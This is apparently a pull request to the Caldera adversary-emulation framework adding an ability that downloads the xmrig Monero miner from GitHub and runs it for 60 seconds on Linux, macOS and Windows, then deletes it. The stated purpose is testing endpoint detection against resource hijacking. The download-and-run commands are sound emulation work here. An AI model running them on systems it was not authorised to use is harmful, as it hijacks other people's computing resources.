### PR TITLE
Add crypto mining ability

### DIFF
--- a/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
+++ b/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
@@ -1,0 +1,50 @@
+- id: 46da2385-cf37-49cb-ba4b-a739c7a19de4
+  name: Crypto (Monero) Mining
+  description: Download and execute Monero miner (xmrig) for 1 minute
+  tactic: impact
+  technique:
+    attack_id: T1496
+    name: Resource Hijacking
+  platforms:
+    linux:
+      sh:
+        # Linux distros should include `timeout` making this easy.
+        # We expect timeout to return a 124, which needs to then return a 0
+        # to make Caldera UI happy.
+        command: |
+          wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;
+          tar -xf xmrig-6.11.2-linux-x64.tar.gz;
+          timeout 60 ./xmrig-6.11.2/xmrig;
+          [ $? -eq 124 ]
+        cleanup: |
+          rm -rf ./xmrig*;
+        timeout: 120
+    darwin:
+      sh:
+        # MacOS does not include timeout, but can mimic the process with screen.
+        # Not using a simple & to background due to TTY conflicts.
+        # Return code should be 0 if screen is launched and killed successfully,
+        # which should make Caldera UI happy.
+        command: |
+          curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;
+          tar -xf xmrig-6.11.2-macos-x64.tar.gz;
+          screen -S miner -dm ./xmrig-6.11.2/xmrig;
+          sleep 60s;
+          killall xmrig;
+          screen -S miner -X quit
+        cleanup: |
+          rm -rf ./xmrig*;
+        timeout: 120
+    windows:
+      psh:
+        # Powershell can background the miner with no issues, so a sleep and
+        # then kill should work properly while keeping Caldera UI happy.
+        command: |
+          Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;
+          Expand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\;
+          Start-Process ".\xmrig-6.11.2\xmrig.exe" -WindowStyle Hidden;
+          Start-Sleep -Seconds 60;
+          Stop-Process -Name "xmrig"
+        cleanup: |
+          rm ./xmrig* -r -fo;
+        timeout: 120


### PR DESCRIPTION
## Description

This pull request adds a single ability to emulate crypto mining using the open-source [xmrig](https://github.com/xmrig/xmrig) binary.

The ability is compatible with Windows, Linux, and MacOS (darwin).

I can confirm that this technique is currently being used in the wild, as we see it often ourselves. It has also been in the [news lately](https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/) in regards to GitHub itself. The attacker gains access to compute resources, downloads xmrig directly from the GitHub release page, and the runs the miner. They generally do so with some customizations to ensure their account gets credited. I'm simply running it with the defaults, which would donate to the devs instead. Anyway, 60 seconds should not be enough to generate any actual Monero.

We recently used this technique when evaluating EDR platforms, and will probably continue to use it in other operations. I believe it is a common technique other orgs could benefit from testing.

We are new-ish users of Caldera, we love it, and we hope we can contribute back a bit. I was unable to find clear guidelines on submitting abilities, so this PR is a first attempt to gauge interest in this type of contribution. Please let me know if there is some official process specifically on submitting abilities.

Relevant ATT&CK technique: [T1496](https://attack.mitre.org/techniques/T1496/)

## Type of change

Please delete options that are not relevant.

- [X] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

I've tested the ability on the following platforms:

- Ubuntu 20.04 LTS
- Windows 10 Pro
- MacOS Catalina

On each platform, I first deployed the Sandcat agent and then ran an adversary profile with this single ability included. The main things I was looking out for are:

- Does the xmrig binary run and start consuming CPU?
- Is the miner successfully killed after 60 seconds?
- Does the Caldera Operation UI show the status as "success" on both the command and on the cleanup?

Testing was successful (answered "yes to each) for the platforms I list above.

## Checklist:

- [ ] My code follows the style guidelines of this project **(I cannot find anything related to abilities)**
- [X] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation **(Is this necessary for abilities?)**
- [ ] I have added tests that prove my fix is effective or that my feature works **(Is this necessary for abilities?)**
